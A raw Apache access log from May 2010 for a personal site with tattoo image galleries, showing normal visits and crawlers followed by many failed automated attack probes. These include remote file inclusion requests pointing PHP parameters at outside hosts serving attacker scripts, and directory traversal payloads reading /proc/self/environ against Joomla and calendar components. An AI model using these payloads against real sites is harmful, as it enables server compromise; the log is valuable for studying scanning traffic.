98.191.125.67 - - [11/May/2010:12:20:00 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:00 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:10 -0500] "GET /tattoo/set1.htm HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:10 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:10 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:10 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:10 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:10 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:10 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:10 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:10 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:10 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:10 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:11 -0500] "GET /tattoo/set2.htm HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:11 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:11 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:11 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:11 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:11 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:11 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:11 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:11 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:11 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:11 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:12 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:12 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:12 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:12 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:12 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:12 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:12 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:12 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:12 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:12 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:12 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:13 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:13 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:13 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:13 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:14 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:14 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:14 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:14 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:14 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:14 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:14 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:14 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:14 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:14 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:14 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:14 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
207.46.204.197 - - [11/May/2010:12:21:40 -0500] "GET /logs/access_log.1205366400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.149.105.8 - - [11/May/2010:12:21:50 -0500] "GET /phphtml.php?htmlclass_path=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.249.71.138 - - [11/May/2010:12:22:30 -0500] "GET /logs/access_log.1270598400 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.129.119.14 - - [11/May/2010:12:22:47 -0500] "GET /logs/access_log.1243468800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.13.45 - - [11/May/2010:12:24:09 -0500] "GET /logs/access_log.1192752000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.149.105.8 - - [11/May/2010:12:24:23 -0500] "GET /errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:12:24:23 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
216.127.70.140 - - [11/May/2010:12:26:01 -0500] "GET /logs/access_log.1273276800//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.gigacenter.cl//tmp/idsuper.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
216.127.70.140 - - [11/May/2010:12:26:01 -0500] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.gigacenter.cl//tmp/idsuper.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
216.127.70.140 - - [11/May/2010:12:26:01 -0500] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.gigacenter.cl//tmp/idsuper.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
216.127.70.140 - - [11/May/2010:12:26:36 -0500] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.gigacenter.cl//tmp/idsuper.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
67.195.112.180 - - [11/May/2010:12:26:47 -0500] "GET /logs/access_log.1211846400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.149.105.8 - - [11/May/2010:12:27:48 -0500] "GET /logs/access_log.1217808000/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:12:27:48 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:12:27:48 -0500] "GET /logs//errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
216.127.70.140 - - [11/May/2010:12:28:37 -0500] "GET /logs/access_log.1219968000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.gigacenter.cl//tmp/idsuper.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
213.149.105.8 - - [11/May/2010:12:33:46 -0500] "GET /errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:12:33:47 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
218.149.84.14 - - [11/May/2010:12:34:17 -0500] "GET /old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:12:34:17 -0500] "GET /logs/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:12:34:17 -0500] "GET /logs/access_log.1273190400/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:12:34:29 -0500] "GET /old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:12:34:29 -0500] "GET /logs/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:12:34:29 -0500] "GET /logs/access_log.1273190400/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.46.13.94 - - [11/May/2010:12:34:39 -0500] "GET /logs/access_log.1191888000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.149.84.14 - - [11/May/2010:12:35:20 -0500] "GET /logs/access_log.1265414400/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:12:35:20 -0500] "GET /logs/access_log.1266278400/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:12:35:21 -0500] "GET /logs/access_log.1265414400/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:12:35:21 -0500] "GET /logs/access_log.1266278400/old_reports.php?file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.46.194.126 - - [11/May/2010:12:37:14 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.126 - - [11/May/2010:12:37:14 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.141 - - [11/May/2010:12:42:33 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.141 - - [11/May/2010:12:42:33 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.141 - - [11/May/2010:12:42:34 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
173.85.118.46 - - [11/May/2010:12:43:39 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.tutorgig.com/ed/flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; FunWebProducts; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; InfoPath.2; AskTB5.6)"
173.85.118.46 - - [11/May/2010:12:43:39 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; FunWebProducts; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; InfoPath.2; AskTB5.6)"
208.115.111.248 - - [11/May/2010:12:46:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
209.62.121.162 - - [11/May/2010:12:48:16 -0500] "GET //TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
194.79.28.66 - - [11/May/2010:12:48:21 -0500] "GET //TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.808"
194.79.28.66 - - [11/May/2010:12:50:21 -0500] "GET /logs/access_log.1273276800//TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 343 "-""libwww-perl/5.808"
194.79.28.66 - - [11/May/2010:12:50:22 -0500] "GET //TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.808"
194.79.28.66 - - [11/May/2010:12:50:22 -0500] "GET /logs//TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
207.46.13.132 - - [11/May/2010:12:51:39 -0500] "GET /logs/access_log.1227744000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
194.79.28.66 - - [11/May/2010:12:53:05 -0500] "GET /logs/access_log.1272067200//TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 343 "-""libwww-perl/5.808"
207.46.13.136 - - [11/May/2010:12:54:09 -0500] "GET /logs/access_log.1167350400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.10 - - [11/May/2010:12:54:22 -0500] "GET /logs/access_log.1214092800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.62.121.162 - - [11/May/2010:12:55:54 -0500] "GET /logs/access_log.1272067200//TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 343 "-""libwww-perl/5.805"
209.62.121.162 - - [11/May/2010:12:55:54 -0500] "GET //TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
209.62.121.162 - - [11/May/2010:12:55:54 -0500] "GET /logs//TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.62.121.162 - - [11/May/2010:12:55:56 -0500] "GET /logs/access_log.1272067200//TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 343 "-""libwww-perl/5.805"
209.62.121.162 - - [11/May/2010:12:55:57 -0500] "GET //TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
209.62.121.162 - - [11/May/2010:12:55:58 -0500] "GET /logs//TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.62.121.162 - - [11/May/2010:12:56:22 -0500] "GET /logs/access_log.1273276800//TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 343 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:12:58:38 -0500] "GET /logs/access_log.1241827200/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:12:58:38 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:12:58:38 -0500] "GET /logs//errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
194.79.28.66 - - [11/May/2010:12:58:51 -0500] "GET /logs/access_log.1272067200//TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 343 "-""libwww-perl/5.808"
194.79.28.66 - - [11/May/2010:12:58:51 -0500] "GET //TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.808"
194.79.28.66 - - [11/May/2010:12:58:51 -0500] "GET /logs//TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
94.23.15.24 - - [11/May/2010:13:01:10 -0500] "GET /index.php?option=com_fabrik&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.149.105.8 - - [11/May/2010:13:02:25 -0500] "GET /logs/access_log.1240617600/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.195.112.180 - - [11/May/2010:13:07:54 -0500] "GET /logs/access_log.1199491200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.30.181.5 - - [11/May/2010:13:12:15 -0500] "GET /logs/access_log.1266278400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.totsmartcall.com/1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
123.30.181.5 - - [11/May/2010:13:12:15 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.totsmartcall.com/1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
123.30.181.5 - - [11/May/2010:13:12:15 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.totsmartcall.com/1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
123.30.181.5 - - [11/May/2010:13:12:15 -0500] "GET /logs/access_log.1265241600/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.totsmartcall.com/1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
211.39.130.176 - - [11/May/2010:13:13:33 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
211.39.130.176 - - [11/May/2010:13:13:33 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
67.195.112.180 - - [11/May/2010:13:14:58 -0500] "GET /logs/access_log.1223251200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
193.252.118.174 - - [11/May/2010:13:15:53 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
114.108.151.149 - - [11/May/2010:13:24:41 -0500] "GET /logs/access_log.1265760000//error.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:13:24:41 -0500] "GET //error.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:13:24:41 -0500] "GET /logs//error.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:13:24:42 -0500] "GET /logs/access_log.1265760000//error.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:13:24:42 -0500] "GET /logs//error.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:13:24:42 -0500] "GET //error.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:13:24:48 -0500] "GET /logs/access_log.1266019200//error.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:13:24:49 -0500] "GET /logs/access_log.1266019200//error.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
